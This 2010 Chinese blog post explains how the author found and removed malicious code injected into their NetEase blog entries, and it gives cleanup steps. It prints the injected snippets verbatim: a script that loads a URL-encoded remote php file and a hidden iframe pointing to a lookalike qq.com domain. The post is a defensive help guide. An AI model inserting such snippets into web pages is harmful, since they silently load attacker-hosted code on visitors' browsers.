注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

逍遥峰.暮雪崖

暮雪江天崖上客,绝尘仙骨剑中诗。

 
 
 

日志

 
 
关于我

江湖,早已融在一壶酒里,慢慢饮下。剑挑襟前雪,香沉明月心,不管寂寞繁华。三千年过往,一抹红尘,谁是我传奇的永恒?绾青丝白发,笑看沧海流沙。

网易考拉推荐

【快剑追魂】博客网页挂马查杀[一]  

2010-10-13 23:00:41|  分类: 快剑追魂 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

 

 

 

 

 

 博客网页挂马查杀 [一]

 

文/快剑

 

 


        一段时间内,浏览博客网页时经常会自动弹出或转向一些非正常页面,如http://3tao......net/love.html及一些网游广告,一直认为是博客系统平台被植入代码,网易会处理这件事,但一直没有改善这种状况。

       近日,又出现一些怪现象(挂马症状):博客首页长了尾巴,一些日志摘要栏内容丢失,而杀软对此无效。

        博客首页底图下方出现一窄条空白页面,白色的,没有内容,博客不上线时可见,登陆后消失。从日志栏看日志列表时,之前设置的摘要内容丢失,而是直接显示了日志版面内容。

 

       于此线索,打开其中一篇丢失摘要内容的日志,进入编辑状态。在可视编辑模式下,版面内容下方空白处拉长,点击空白处可见多出的一空白页面;进入<>代码编辑状态,整页代码中多出两段非正常代码,其中一段在中间位置,内容为:
<WBR on>
<SCRIPT ?%28%27?>document.getElementsByTagName("script")[0].src=unescape("%68%74%74%70%3a%2f%2f%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6d%2e%70%68%70")</SCRIPT>
</STYLE>

另一段在代码结尾处,内容:

<IFRAME height=600 src="http://imgcache.qq.com.qqdiy.info/tt.php" frameBorder=0  width=600 scrolling=no></IFRAME>

这是日志被植入的两段恶意代码,姑且称之为网页木马。

这些代码植入的日志,通常是近期发表的,特别是日志栏列表首页的日志。

 

查杀方法:

       如果浏览博客时也有上述类似情况发生,就有可能是网页挂马,对近期日志做一次检查。 进入日志<>代码编辑状态,查看是否有上述怪异代码隐藏其中,可能完全相同,也可能相似。

      上段中有明显的<WBR on><SCRIPT ?%28%27?>......</SCRIPT></STYLE>代码,下段中有明显的<IFRAME src="http://......" ></IFRAME>代码,将这两段代码删除即可,其它正常版面编辑代码不用处理,更新日志。

 

      查杀之后,网页恢复正常。

      查阅相关资料,据说查杀之后,博客网页具有免疫力,不知真否,以待观察。

 

 

 快剑.  2010年10月13日

 

其它挂马症状及查杀方法:

博客网页挂马查杀[二] 

 

 

 

 

 

  评论这张
 
阅读(1101)| 评论(7)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017